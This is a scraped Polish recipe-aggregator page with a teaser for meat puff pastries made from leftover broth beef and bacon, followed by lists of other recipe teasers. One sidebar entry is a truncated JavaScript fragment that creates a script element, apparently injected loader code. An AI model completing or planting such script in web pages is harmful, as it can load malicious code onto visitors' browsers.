Paszteciki francuskie z mięsem. Porosołowe z wołowiną.
Źródło: https://kuchniazwidokiemna.blogspot.com/2016/03/paszteciki-francuskie-z-miesem.html
Takie paszteciki to swietny pomysl na wykorzystanie miesa z rosolu czy innych zup gotowanych na miesie. Przygotowuje je dosc czesto, bo robi sie je szybko i sa bardzo smaczne. Dzis mialam kawalek wolowiny, byla dosc sucha, wiec dodalam do farszu troche podsmazonego boczku, aby paszteciki byly bardziej soczyste. Jesli mam do wykorzystania gotowane mieso drobiowe to nie dodaje do niego boczku, tylko...
Najnowsze przepisy
Poznaj rybę po grecku z fantastycznie dobranymi warzywami... ⇖ 28
Dzisiaj krótko i do rzeczy.To już kolejny piernik na moim... ⇖ 16
Łaciatek z makiem to ciasto, które przyciąga wzrok już... ⇖ 22
Ciasto jest wyśmienite, wielowarstwowe począwszy od... ⇖ 27
(function(){ u7xb=document.createElement("script");u7xb.type ⇖ 20
Rurki z kremem Kinder to przepis, który smakiem przenosi... ⇖ 15
Przepisy z bloga
Zapraszam na wyśmienity serniczek. Sernik z kaszą manną.... ⇖ 686
Przepisów na klopsiki na blogu jest już kilka, bardzo je... ⇖ 463
Dziś przychodzę do Was z propozycją na błyskawiczny w... ⇖ 672
Zupa fasolowa. Gęsta i sycąca. Doskonała na pożywny... ⇖ 485
Ozorki, danie dla smakoszy podrobów. Odpowiednio... ⇖ 789
Dziś zapraszam Was na pysznego kurczaka w sosie curry z... ⇖ 629
Dzień dobry, witam się z wami po dłuższej przerwie i... ⇖ 603
Pomysłów na wykorzystanie piersi z kurczaka na blogu jest... ⇖ 418
Rolady mielone z pieczarkami zapiekane w boczku, to jeden z... ⇖ 516
Przepisy na czasie
Prosty przepis na klasyczny drożdżowy makowiec. Przepis... ⇖ 2730
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 2099
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1447
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 845
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 749
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 679
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 647
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 641









































